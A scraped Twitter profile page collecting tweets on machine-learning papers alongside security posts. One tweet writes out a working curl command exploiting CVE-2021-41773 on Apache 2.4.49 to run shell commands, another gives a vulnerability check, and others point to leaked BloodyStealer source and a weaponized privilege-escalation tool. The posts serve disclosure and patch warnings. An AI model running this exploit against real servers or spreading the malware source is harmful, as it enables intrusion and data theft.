cd80 (@cd8020) 's Twitter Profile
cd80

@cd8020

ID: 1236931622743584769

calendar_today09-03-2020 08:27:43

163 Tweet

173 Takipçi

375 Takip Edilen

Jean de Nyandwi (@jeande_d) 's Twitter Profile Photo

Reading papers is no doubt the best way to stay up to date in things like machine learning that are always evolving. I came across this repo that contains annotated papers. Very easy to read and understand. github.com/AakashKumarNai… Awesome work Aakash Kumar Nain 👏

Stat.ML Papers (@statmlpapers) 's Twitter Profile Photo

A Farewell to the Bias-Variance Tradeoff? An Overview of the Theory of Overparameterized Machine Learning. (arXiv:2109.02355v1 [stat.ML]) ift.tt/38OCr7f

hardmaru (@hardmaru) 's Twitter Profile Photo

The Sensory Neuron as a Transformer: Permutation-Invariant Neural Networks for Reinforcement Learning We explore RL agents that still work even when their observations get shuffled around a lot! A fun paper w/ Yujin Tang web attentionneuron.github.io pdf arxiv.org/abs/2109.02869

Swissky (@pentest_swissky) 's Twitter Profile Photo

Candy Potato (Caramelized Juicy Potato) Pure C++, weaponized, fully automated implementation of RottenPotatoNG github.com/klezVirus/Cand…

GeekNews (@geeknewshada) 's Twitter Profile Photo

2.5년간 1주에 40-50시간 업무용으로 VR을 사용한 사람의 후기 j.mp/3ifCm1E - 오큘러스 퀘스트 2와 Immersed(VR 업무환경 SW)를 이용 - 정보시스템 개발 같은 일반 프로그래밍 업무를 수행했음 - Immersed 로 가상 3-스크린 구성 ㅤ→ 메인 스크린 : 업무 (4k, 6m x 4.6m, 4:3) ㅤ...

~ (@xerub) 's Twitter Profile Photo

kudos to phrack.org for everything it stands for :) excuses for me being a bad writer :( phrack.org/issues/70/12.h…

Engineering at Meta (@fb_engineering) 's Twitter Profile Photo

Now that our services are fully restored, we are sharing more details about yesterday's outage. engineering.fb.com/2021/10/05/net…

hackerfantastic.x (@hackerfantastic) 's Twitter Profile Photo

Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49 curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv Patch urgently.

Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49

curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

Patch urgently.
Mikhail Klyuchnikov (@m1ke_n1) 's Twitter Profile Photo

⚠️ For detecting the CVE-2021-41773 you just need to check the path "/.%2e/". 403 -> Server is vulnerable 400 -> Server isn't vulnerable And don't forget, your app doesn't have to have the "/cgi-bin/" path. The app may have another useful Alias.

⚠️ For detecting the CVE-2021-41773 you just need to check the path "/.%2e/".

403 -> Server is vulnerable
400 -> Server isn't vulnerable

And don't forget, your app doesn't have to have the "/cgi-bin/" path. The app may have another useful Alias.
vx-underground (@vxunderground) 's Twitter Profile Photo

September 27th, 2021 - SecureList released a report on 'BloodyStealer', a data stealer being sold on Russian-speaking forums. The source code has been leaked online. You can download Win32.BloodyStealer from our source code leak collection here: github.com/vxunderground/…

AK (@_akhaliq) 's Twitter Profile Photo

Non-deep Networks abs: arxiv.org/abs/2110.07641 By utilizing parallel substructures, a network with a depth of just 12 can achieve top-1 accuracy over 80% on ImageNet, 96% on CIFAR10, and 81% on CIFAR100

Non-deep Networks
abs: arxiv.org/abs/2110.07641

By utilizing parallel substructures, a network with a
depth of just 12 can achieve top-1 accuracy over 80% on ImageNet, 96% on CIFAR10, and 81% on CIFAR100
Papers with Code (@paperswithcode) 's Twitter Profile Photo

Graph neural networks are rapidly advancing progress in ML for complex graph data applications. In this week’s newsletter, we show you recent uses of GNNs ranging from protein interface prediction to collaborative filtering! Read on below: paperswithcode.com/newsletter/19/

Graph neural networks are rapidly advancing progress in ML for complex graph data applications.

In this week’s newsletter, we show you recent uses of GNNs ranging from protein interface prediction to collaborative filtering! Read on below:

paperswithcode.com/newsletter/19/
ESET Research (@esetresearch) 's Twitter Profile Photo

#ESETresearch discovered a trojanized IDA Pro installer, distributed by the #Lazarus APT group. Attackers bundled the original IDA Pro 7.5 software developed by Hex-Rays SA with two malicious components. Anton Cherepanov 1/5

#ESETresearch discovered a trojanized IDA Pro installer, distributed by the #Lazarus APT group. Attackers bundled the original IDA Pro 7.5 software developed by <a href="/HexRaysSA/">Hex-Rays SA</a> with two malicious components. <a href="/cherepanov74/">Anton Cherepanov</a> 1/5